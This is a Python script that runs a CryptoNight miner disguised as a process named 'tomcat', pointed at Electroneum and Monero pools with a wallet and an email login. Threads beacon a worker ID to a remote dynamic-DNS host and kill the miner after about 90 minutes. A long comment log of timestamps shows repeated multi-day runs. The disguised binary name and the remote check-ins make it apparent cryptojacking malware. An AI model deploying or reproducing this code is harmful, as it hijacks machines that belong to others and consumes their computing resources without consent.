import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:49:04.922361
#2018-02-17 16:37:06.979851
#2018-02-17 18:25:05.604804
#2018-02-17 20:13:05.790119
#2018-02-17 22:01:07.846754
#2018-02-17 23:45:01.395472
#2018-02-18 01:36:01.613750
#2018-02-18 03:23:05.837232
#2018-02-18 05:11:06.987720
#2018-02-18 07:05:03.467820
#2018-02-18 08:53:04.829185
#2018-02-18 10:40:09.356903
#2018-02-18 12:25:02.899294
#2018-02-18 14:13:05.453077
#2018-02-18 16:03:04.923545
#2018-02-18 17:51:05.632582
#2018-02-18 19:37:05.993935
#2018-02-18 21:22:05.512246
#2018-02-18 23:11:05.763613
#2018-02-19 00:57:05.333231
#2018-02-19 02:44:05.313719
#2018-02-19 04:31:06.830572
#2018-02-19 06:16:07.586591
#2018-02-19 08:04:05.156770
#2018-02-19 09:54:01.699922
#2018-02-19 11:43:05.601990
#2018-02-19 13:29:08.509252
#2018-02-19 15:17:01.443947
#2018-02-19 17:04:09.441592
#2018-02-19 18:51:09.895145
#2018-02-19 20:39:07.854005
#2018-02-19 22:26:05.205673
#2018-02-20 00:12:04.843148
#2018-02-20 01:58:06.886763
#2018-02-20 03:48:01.500006
#2018-02-20 05:32:06.198402
#2018-02-20 07:16:04.451136
#2018-02-20 09:02:07.717836
#2018-02-20 10:45:12.076355
#2018-02-20 12:33:08.197007
#2018-02-20 14:18:07.715699
#2018-02-20 16:03:04.981975
#2018-02-20 17:49:01.720401
#2018-02-20 19:40:04.686882
#2018-02-20 21:26:05.254943
#2018-02-20 23:11:02.118613
#2018-02-21 00:54:02.263123
#2018-02-21 02:41:07.097257
#2018-02-21 04:29:04.964610
#2018-02-21 06:16:07.293747
#2018-02-21 08:02:05.830537
#2018-02-21 09:47:06.431689
#2018-02-21 11:36:04.325667
#2018-02-21 13:25:07.548417
#2018-02-21 15:10:10.126335
#2018-02-21 17:23:04.984226
#2018-02-21 19:12:02.221201
#2018-02-21 21:01:08.531285
#2018-02-21 22:47:01.629470
#2018-02-22 00:33:01.539040
#2018-02-22 02:20:01.457574
#2018-02-22 04:06:08.169813
#2018-02-22 05:51:05.598306
#2018-02-22 07:38:05.662387
#2018-02-22 09:26:08.223013
#2018-02-22 11:12:07.164788
#2018-02-22 12:58:10.034383
#2018-02-22 14:46:05.580765
#2018-02-22 16:31:10.366223
#2018-02-22 18:18:07.573509
#2018-02-22 20:11:02.201196
#2018-02-22 21:57:05.515912
#2018-02-22 23:46:05.894559
#2018-02-23 01:35:08.670353
#2018-02-23 03:21:05.870250
#2018-02-23 05:07:05.196985
#2018-02-23 06:51:08.553120
#2018-02-23 08:42:04.695128
#2018-02-23 10:58:01.625238
#2018-02-23 12:53:07.531846
#2018-02-23 14:39:01.271725
#2018-02-23 16:29:05.047121
#2018-02-23 18:16:01.279895
#2018-02-23 20:00:11.388205
#2018-02-23 21:44:03.647906
#2018-02-23 23:38:08.813950
#2018-02-24 01:28:08.318061
#2018-02-24 03:19:04.140028
#2018-02-24 05:04:01.354986
#2018-02-24 06:52:05.911903
#2018-02-24 08:42:03.845060
#2018-02-24 10:26:06.365401
#2018-02-24 12:21:05.740261
#2018-02-24 14:14:01.469145
#2018-02-24 16:00:09.072459
#2018-02-24 17:52:03.881485
#2018-02-24 19:39:03.529461
#2018-02-24 21:26:06.753597
#2018-02-25 00:09:06.036615
#2018-02-25 04:22:04.279427
#2018-02-25 07:53:02.099492